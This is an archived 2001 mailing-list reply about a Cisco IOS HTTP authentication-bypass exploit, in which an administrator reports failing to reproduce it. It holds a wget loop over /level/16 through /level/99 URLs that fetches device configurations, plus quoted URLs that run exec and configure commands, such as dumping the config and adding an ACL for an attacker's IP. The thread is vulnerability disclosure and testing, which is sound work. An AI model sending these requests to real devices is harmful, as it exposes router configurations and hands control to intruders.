Re: Cisco device HTTP exploit...

From: Marc-Adrian Napoli (marcadrianat_private)
Date: Mon Jul 02 2001 - 23:57:45 PDT

Next message: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."

Previous message: ios http: "ios-http-auth.sh"
In reply to: Half Adder: "Cisco device HTTP exploit..."
Next in thread: Damir Rajnovic: "Re: Cisco device HTTP exploit..."
Next in thread: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."
Reply: Damir Rajnovic: "Re: Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi,

i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's?

ip http server
ip http authentication local

i have a little /bin/sh that does the following:

wget http://10.10.10.10/level/16/show/config
.
.
wget http://10.10.10.10/level/99/show/config


i get auth failed on all of them! anyone?

Regards,

Marc-Adrian Napoli
Network Administrator
Connect infobahn Australia
+61 2 92120387


> You can also run configuration commands. :)
> 
> http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.
> 
> Start with http://169.254.0.16/level/xx/configure  and go from there.
> 
> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
> 
> to get, for instance, vty 0 4 acl information and then add an ACL for
> his/her source ip. 
> 
> I tested creating a banner.  I assume other configure commands will work
> as well.  This was tested on a Cisco switch.  Anyone?
> 
> 
> 
>

Next message: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."
Previous message: ios http: "ios-http-auth.sh"
In reply to: Half Adder: "Cisco device HTTP exploit..."
Next in thread: Damir Rajnovic: "Re: Cisco device HTTP exploit..."
Next in thread: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."
Reply: Damir Rajnovic: "Re: Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 12:18:15 PDT